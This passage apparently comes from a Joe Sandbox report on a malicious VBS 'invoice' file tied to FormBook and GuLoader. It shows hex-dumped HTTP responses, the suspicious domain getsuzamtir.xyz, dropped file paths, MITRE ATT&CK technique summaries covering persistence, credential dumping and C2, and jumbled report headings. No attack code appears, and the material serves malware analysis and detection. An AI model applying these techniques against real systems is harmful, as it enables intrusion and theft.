3d 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 43 6c 69 63 6b 20 4c 65 61 73 65 72 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 63 6b 6c 65 61 73 65 72 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 43 6c 69 63 6b 20 4c 65 61 73 65 72 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 63 6b 6c 65 61 73 65 72 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 May 2022 12:26:47 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 65 74 73 75 7a 61 6d 74 69 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.getsuzamtir.xyz Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 10 May 2022 12:27:25 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report WWVN_INVOICE_8363567453.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Threatname: GuLoader

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\DB1

C:\Users\user\AppData\Local\Temp\Hetero3.dat

C:\Users\user\AppData\Local\Temp\RES2E9C.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f0xsdwy4.l4z.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tjjzqpmp.eor.psm1

C:\Users\user\AppData\Local\Temp\gkb1wfd4\CSC1FB6CDA7423C41F280B0C76B8C389BB7.TMP

C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.0.cs

C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.cmdline

C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.dll

C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.out

C:\Users\user\AppData\Roaming\2LMM06TC\2LMlogim.jpeg

C:\Users\user\AppData\Roaming\2LMM06TC\2LMlogrf.ini

C:\Users\user\AppData\Roaming\2LMM06TC\2LMlogrg.ini

C:\Users\user\AppData\Roaming\2LMM06TC\2LMlogri.ini

Windows Analysis Report
WWVN_INVOICE_8363567453.vbs

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre